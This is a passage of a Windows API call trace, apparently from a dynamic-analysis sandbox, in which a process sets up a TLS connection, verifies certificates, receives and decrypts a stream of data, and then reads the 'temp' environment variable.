	[0909.177] InitializeSecurityContextW (in: phCredential=0x1c75d3b0, phContext=0x1c75d660, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e10778, Reserved2=0x0, phNewContext=0x1c75d3a0, pOutput=0x2e10798, pfContextAttr=0x1c75d398, ptsExpiry=0x1c75d390 | out: phNewContext=0x1c75d3a0, pOutput=0x2e10798, pfContextAttr=0x1c75d398, ptsExpiry=0x1c75d390) returned 0x90312
	[0909.179] recv (in: s=0x4d4, buf=0x2e10888, len=5, flags=0 | out: buf=0x2e10888*) returned 5
	[0909.179] recv (in: s=0x4d4, buf=0x2e108ad, len=331, flags=0 | out: buf=0x2e108ad*) returned 331
	[0909.179] InitializeSecurityContextW (in: phCredential=0x1c75d2e0, phContext=0x1c75d590, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e10ac8, Reserved2=0x0, phNewContext=0x1c75d2d0, pOutput=0x2e10ae8, pfContextAttr=0x1c75d2c8, ptsExpiry=0x1c75d2c0 | out: phNewContext=0x1c75d2d0, pOutput=0x2e10ae8, pfContextAttr=0x1c75d2c8, ptsExpiry=0x1c75d2c0) returned 0x90312
	[0909.188] recv (in: s=0x4d4, buf=0x2e10bd8, len=5, flags=0 | out: buf=0x2e10bd8*) returned 5
	[0909.188] recv (in: s=0x4d4, buf=0x2e10bfd, len=4, flags=0 | out: buf=0x2e10bfd*) returned 4
	[0909.188] InitializeSecurityContextW (in: phCredential=0x1c75d210, phContext=0x1c75d4c0, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e10cd8, Reserved2=0x0, phNewContext=0x1c75d200, pOutput=0x2e10cf8, pfContextAttr=0x1c75d1f8, ptsExpiry=0x1c75d1f0 | out: phNewContext=0x1c75d200, pOutput=0x2e10cf8, pfContextAttr=0x1c75d1f8, ptsExpiry=0x1c75d1f0) returned 0x90312
	[0909.194] FreeContextBuffer (in: pvContextBuffer=0x1b7763a0 | out: pvContextBuffer=0x1b7763a0) returned 0x0
	[0909.194] send (s=0x4d4, buf=0x2e10dc8*, len=134, flags=0) returned 134
	[0909.195] recv (in: s=0x4d4, buf=0x2e10dc8, len=5, flags=0 | out: buf=0x2e10dc8*) returned 5
	[0909.312] recv (in: s=0x4d4, buf=0x2e10dcd, len=1, flags=0 | out: buf=0x2e10dcd*) returned 1
	[0909.312] InitializeSecurityContextW (in: phCredential=0x1c75d140, phContext=0x1c75d3f0, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e10f40, Reserved2=0x0, phNewContext=0x1c75d130, pOutput=0x2e10f60, pfContextAttr=0x1c75d128, ptsExpiry=0x1c75d120 | out: phNewContext=0x1c75d130, pOutput=0x2e10f60, pfContextAttr=0x1c75d128, ptsExpiry=0x1c75d120) returned 0x90312
	[0909.313] recv (in: s=0x4d4, buf=0x2e11050, len=5, flags=0 | out: buf=0x2e11050*) returned 5
	[0909.313] recv (in: s=0x4d4, buf=0x2e11075, len=48, flags=0 | out: buf=0x2e11075*) returned 48
	[0909.313] InitializeSecurityContextW (in: phCredential=0x1c75d070, phContext=0x1c75d320, pTargetName=0x2e01ab0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2e11178, Reserved2=0x0, phNewContext=0x1c75d060, pOutput=0x2e11198, pfContextAttr=0x1c75d058, ptsExpiry=0x1c75d050 | out: phNewContext=0x1c75d060, pOutput=0x2e11198, pfContextAttr=0x1c75d058, ptsExpiry=0x1c75d050) returned 0x0
	[0909.603] QueryContextAttributesW (in: phContext=0x1c75d2d0, ulAttribute=0x4, pBuffer=0x2e112b0 | out: pBuffer=0x2e112b0) returned 0x0
	[0909.603] QueryContextAttributesW (in: phContext=0x1c75d2d0, ulAttribute=0x5a, pBuffer=0x2e11330 | out: pBuffer=0x2e11330) returned 0x0
	[0909.611] QueryContextAttributesW (in: phContext=0x1c75d180, ulAttribute=0x53, pBuffer=0x2e11680 | out: pBuffer=0x2e11680) returned 0x0
	[0909.616] CertDuplicateCRLContext (pCrlContext=0x1b771e70) returned 0x1b771e70
	[0909.618] CertDuplicateStore (hCertStore=0x2f65b0) returned 0x2f65b0
	[0909.619] CertEnumCertificatesInStore (hCertStore=0x2f65b0, pPrevCertContext=0x0) returned 0x1b771ef0
	[0909.619] CertDuplicateCRLContext (pCrlContext=0x1b771ef0) returned 0x1b771ef0
	[0909.620] CertEnumCertificatesInStore (hCertStore=0x2f65b0, pPrevCertContext=0x1b771ef0) returned 0x1b771e70
	[0909.620] CertDuplicateCRLContext (pCrlContext=0x1b771e70) returned 0x1b771e70
	[0909.620] CertEnumCertificatesInStore (hCertStore=0x2f65b0, pPrevCertContext=0x1b771e70) returned 0x0
	[0909.620] CertCloseStore (hCertStore=0x2f65b0, dwFlags=0x0) returned 1
	[0909.620] CertFreeCRLContext (pCrlContext=0x1b771e70) returned 1
	[0910.127] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2f64e0
	[0910.128] CertAddCRLLinkToStore (in: hCertStore=0x2f64e0, pCrlContext=0x1b771ef0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0910.128] CertAddCRLLinkToStore (in: hCertStore=0x2f64e0, pCrlContext=0x1b771e70, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0910.134] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b771e70, pTime=0x1c75d188, hAdditionalStore=0x2f64e0, pChainPara=0x1c75d190, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c75d180 | out: ppChainContext=0x1c75d180) returned 1
	[0911.606] CertDuplicateCertificateChain (pChainContext=0x1cda65c0) returned 0x1cda65c0
	[0911.607] CertDuplicateCRLContext (pCrlContext=0x1b771e70) returned 0x1b771e70
	[0911.608] CertDuplicateCRLContext (pCrlContext=0x1cdec480) returned 0x1cdec480
	[0911.608] CertDuplicateCRLContext (pCrlContext=0x1cdec500) returned 0x1cdec500
	[0911.608] CertFreeCertificateChain (pChainContext=0x1cda65c0) 
	[0911.609] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cda65c0, pPolicyPara=0x1c75d308, pPolicyStatus=0x1c75d2e8 | out: pPolicyStatus=0x1c75d2e8) returned 1
	[0911.610] SetLastError (dwErrCode=0x0) 
	[0911.614] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cda65c0, pPolicyPara=0x1c75d3e0, pPolicyStatus=0x1c75d3c8 | out: pPolicyStatus=0x1c75d3c8) returned 1
	[0911.617] CertFreeCertificateChain (pChainContext=0x1cda65c0) 
	[0911.617] CertFreeCRLContext (pCrlContext=0x1b771e70) returned 1
	[0911.621] EncryptMessage (in: phContext=0x1c75d990, fQOP=0x0, pMessage=0x2e13db0, MessageSeqNo=0x0 | out: pMessage=0x2e13db0) returned 0x0
	[0911.621] send (s=0x4d4, buf=0x2e13af0*, len=117, flags=0) returned 117
	[0911.635] setsockopt (s=0x4d4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0911.635] recv (in: s=0x4d4, buf=0x2e13f10, len=5, flags=0 | out: buf=0x2e13f10*) returned 5
	[0912.017] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 1067
	[0912.017] recv (in: s=0x4d4, buf=0x2e14360, len=15349, flags=0 | out: buf=0x2e14360*) returned 15349
	[0912.285] DecryptMessage (in: phContext=0x1c75d550, pMessage=0x2e18068, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e18068, pfQOP=0x0) returned 0x0
	[0912.313] setsockopt (s=0x4d4, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0912.376] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0912.376] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 6086
	[0912.376] recv (in: s=0x4d4, buf=0x2e156fb, len=10330, flags=0 | out: buf=0x2e156fb*) returned 10330
	[0912.553] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e39678, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e39678, pfQOP=0x0) returned 0x0
	[0912.557] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0912.557] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 1993
	[0912.557] recv (in: s=0x4d4, buf=0x2e146fe, len=14423, flags=0 | out: buf=0x2e146fe*) returned 14423
	[0912.804] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e398b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e398b8, pfQOP=0x0) returned 0x0
	[0912.805] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0912.805] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 1116
	[0912.805] recv (in: s=0x4d4, buf=0x2e14391, len=15300, flags=0 | out: buf=0x2e14391*) returned 15300
	[0913.178] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e39af8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e39af8, pfQOP=0x0) returned 0x0
	[0913.179] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0913.179] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 775
	[0913.179] recv (in: s=0x4d4, buf=0x2e1423c, len=15641, flags=0 | out: buf=0x2e1423c*) returned 15641
	[0913.435] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e39d38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e39d38, pfQOP=0x0) returned 0x0
	[0913.438] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0913.438] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 434
	[0913.438] recv (in: s=0x4d4, buf=0x2e140e7, len=15982, flags=0 | out: buf=0x2e140e7*) returned 15982
	[0913.745] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e39fc8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e39fc8, pfQOP=0x0) returned 0x0
	[0913.749] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0913.750] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 3309
	[0913.750] recv (in: s=0x4d4, buf=0x2e14c22, len=13107, flags=0 | out: buf=0x2e14c22*) returned 13107
	[0913.849] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3a208, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3a208, pfQOP=0x0) returned 0x0
	[0913.850] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0913.850] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 824
	[0913.850] recv (in: s=0x4d4, buf=0x2e1426d, len=15592, flags=0 | out: buf=0x2e1426d*) returned 15592
	[0914.081] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3a448, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3a448, pfQOP=0x0) returned 0x0
	[0914.082] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0914.082] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 3699
	[0914.082] recv (in: s=0x4d4, buf=0x2e14da8, len=12717, flags=0 | out: buf=0x2e14da8*) returned 12717
	[0914.382] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3a6b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3a6b0, pfQOP=0x0) returned 0x0
	[0914.382] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0914.382] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 1214
	[0914.382] recv (in: s=0x4d4, buf=0x2e143f3, len=15202, flags=0 | out: buf=0x2e143f3*) returned 15202
	[0914.482] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3a8f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3a8f0, pfQOP=0x0) returned 0x0
	[0914.482] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0914.482] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 1945
	[0914.482] recv (in: s=0x4d4, buf=0x2e146ce, len=14471, flags=0 | out: buf=0x2e146ce*) returned 14471
	[0914.618] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3ab30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3ab30, pfQOP=0x0) returned 0x0
	[0914.619] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 1
	[0914.619] recv (in: s=0x4d4, buf=0x2e13f31, len=4, flags=0 | out: buf=0x2e13f31*) returned 4
	[0914.637] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 2140
	[0914.637] recv (in: s=0x4d4, buf=0x2e14791, len=14276, flags=0 | out: buf=0x2e14791*) returned 14276
	[0914.750] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3ad98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3ad98, pfQOP=0x0) returned 0x0
	[0914.751] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0914.751] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 2871
	[0914.751] recv (in: s=0x4d4, buf=0x2e14a6c, len=13545, flags=0 | out: buf=0x2e14a6c*) returned 13545
	[0915.046] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3afd8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3afd8, pfQOP=0x0) returned 0x0
	[0915.049] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0915.050] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 8426
	[0915.050] recv (in: s=0x4d4, buf=0x2e1601f, len=7990, flags=0 | out: buf=0x2e1601f*) returned 3472
	[0915.138] recv (in: s=0x4d4, buf=0x2e16daf, len=4518, flags=0 | out: buf=0x2e16daf*) returned 280
	[0915.138] recv (in: s=0x4d4, buf=0x2e16ec7, len=4238, flags=0 | out: buf=0x2e16ec7*) returned 4238
	[0915.147] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3b268, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3b268, pfQOP=0x0) returned 0x0
	[0915.149] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0915.149] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 6477
	[0915.149] recv (in: s=0x4d4, buf=0x2e15882, len=9939, flags=0 | out: buf=0x2e15882*) returned 9939
	[0915.243] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3b4a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3b4a8, pfQOP=0x0) returned 0x0
	[0915.244] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0915.244] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 3992
	[0915.244] recv (in: s=0x4d4, buf=0x2e14ecd, len=12424, flags=0 | out: buf=0x2e14ecd*) returned 3216
	[0916.089] recv (in: s=0x4d4, buf=0x2e15b5d, len=9208, flags=0 | out: buf=0x2e15b5d*) returned 9208
	[0916.090] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3b6e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3b6e8, pfQOP=0x0) returned 0x0
	[0916.090] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0916.090] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 3115
	[0916.090] recv (in: s=0x4d4, buf=0x2e14b60, len=13301, flags=0 | out: buf=0x2e14b60*) returned 13301
	[0916.688] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3b928, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3b928, pfQOP=0x0) returned 0x0
	[0916.689] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0916.689] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 16416
	[0916.689] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3bb90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3bb90, pfQOP=0x0) returned 0x0
	[0916.690] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0916.690] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 16416
	[0916.690] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3bdd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3bdd0, pfQOP=0x0) returned 0x0
	[0916.691] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0916.691] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 6380
	[0916.691] recv (in: s=0x4d4, buf=0x2e15821, len=10036, flags=0 | out: buf=0x2e15821*) returned 10036
	[0916.781] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3c010, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3c010, pfQOP=0x0) returned 0x0
	[0916.782] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0916.782] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 1751
	[0916.782] recv (in: s=0x4d4, buf=0x2e1460c, len=14665, flags=0 | out: buf=0x2e1460c*) returned 14665
	[0917.067] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3c250, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3c250, pfQOP=0x0) returned 0x0
	[0917.069] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0917.069] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 14810
	[0917.070] recv (in: s=0x4d4, buf=0x2e1790f, len=1606, flags=0 | out: buf=0x2e1790f*) returned 1606
	[0917.078] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3c4b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3c4b8, pfQOP=0x0) returned 0x0
	[0917.079] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0917.079] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 5357
	[0917.079] recv (in: s=0x4d4, buf=0x2e15422, len=11059, flags=0 | out: buf=0x2e15422*) returned 11059
	[0918.038] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3c6f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3c6f8, pfQOP=0x0) returned 0x0
	[0918.039] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0918.039] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 16416
	[0918.051] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3c938, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3c938, pfQOP=0x0) returned 0x0
	[0918.051] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0918.051] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 16416
	[0918.064] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3cb78, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3cb78, pfQOP=0x0) returned 0x0
	[0918.065] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0918.065] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 5942
	[0918.065] recv (in: s=0x4d4, buf=0x2e1566b, len=10474, flags=0 | out: buf=0x2e1566b*) returned 10474
	[0918.556] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3cde0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3cde0, pfQOP=0x0) returned 0x0
	[0918.557] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0918.557] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 777
	[0918.557] recv (in: s=0x4d4, buf=0x2e1423e, len=15639, flags=0 | out: buf=0x2e1423e*) returned 15639
	[0918.757] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3d020, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3d020, pfQOP=0x0) returned 0x0
	[0918.760] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0918.760] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 5796
	[0918.760] recv (in: s=0x4d4, buf=0x2e155d9, len=10620, flags=0 | out: buf=0x2e155d9*) returned 10620
	[0918.990] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3d260, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3d260, pfQOP=0x0) returned 0x0
	[0918.990] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0918.991] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 6527
	[0918.991] recv (in: s=0x4d4, buf=0x2e158b4, len=9889, flags=0 | out: buf=0x2e158b4*) returned 9889
	[0919.786] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3d4a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3d4a0, pfQOP=0x0) returned 0x0
	[0919.792] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0919.793] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 290
	[0919.793] recv (in: s=0x4d4, buf=0x2e14057, len=16126, flags=0 | out: buf=0x2e14057*) returned 16126
	[0920.360] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3d730, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3d730, pfQOP=0x0) returned 0x0
	[0920.362] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0920.362] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 14421
	[0920.363] recv (in: s=0x4d4, buf=0x2e1778a, len=1995, flags=0 | out: buf=0x2e1778a*) returned 1995
	[0920.369] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3d970, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3d970, pfQOP=0x0) returned 0x0
	[0920.370] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0920.370] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 3896
	[0920.370] recv (in: s=0x4d4, buf=0x2e14e6d, len=12520, flags=0 | out: buf=0x2e14e6d*) returned 12520
	[0921.637] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3dbb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3dbb0, pfQOP=0x0) returned 0x0
	[0921.638] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0921.638] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 16416
	[0921.638] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3ddf0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3ddf0, pfQOP=0x0) returned 0x0
	[0921.639] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0921.639] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 3214
	[0921.639] recv (in: s=0x4d4, buf=0x2e14bc3, len=13202, flags=0 | out: buf=0x2e14bc3*) returned 10184
	[0921.828] recv (in: s=0x4d4, buf=0x2e1738b, len=3018, flags=0 | out: buf=0x2e1738b*) returned 3018
	[0921.828] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3e058, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3e058, pfQOP=0x0) returned 0x0
	[0921.828] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0921.828] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 193
	[0921.829] recv (in: s=0x4d4, buf=0x2e13ff6, len=16223, flags=0 | out: buf=0x2e13ff6*) returned 16223
	[0922.123] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3e298, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3e298, pfQOP=0x0) returned 0x0
	[0922.124] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0922.124] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 4140
	[0922.124] recv (in: s=0x4d4, buf=0x2e14f61, len=12276, flags=0 | out: buf=0x2e14f61*) returned 12276
	[0922.281] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3e4d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3e4d8, pfQOP=0x0) returned 0x0
	[0922.281] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0922.282] recv (in: s=0x4d4, buf=0x2e13f35, len=16416, flags=0 | out: buf=0x2e13f35*) returned 583
	[0922.282] recv (in: s=0x4d4, buf=0x2e1417c, len=15833, flags=0 | out: buf=0x2e1417c*) returned 15833
	[0922.609] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3e718, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3e718, pfQOP=0x0) returned 0x0
	[0922.609] recv (in: s=0x4d4, buf=0x2e13f30, len=5, flags=0 | out: buf=0x2e13f30*) returned 5
	[0922.609] recv (in: s=0x4d4, buf=0x2e13f35, len=4736, flags=0 | out: buf=0x2e13f35*) returned 1314
	[0922.609] recv (in: s=0x4d4, buf=0x2e14457, len=3422, flags=0 | out: buf=0x2e14457*) returned 3422
	[0922.705] DecryptMessage (in: phContext=0x1c75db20, pMessage=0x2e3e930, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2e3e930, pfQOP=0x0) returned 0x0
	[0922.709] SetEvent (hEvent=0x388) returned 1
	[0930.334] CoTaskMemAlloc (cb=0x104) returned 0x1b7439a0
	[0930.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7439a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0930.334] CoTaskMemFree (pv=0x1b7439a0) 
	[0930.335] CoTaskMemAlloc (cb=0x104) returned 0x1b7439a0
	[0930.335] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b7439a0, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0930.335] CoTaskMemFree (pv=0x1b7439a0) 
	[0930.341] CoTaskMemAlloc (cb=0x104) returned 0x1b7439a0
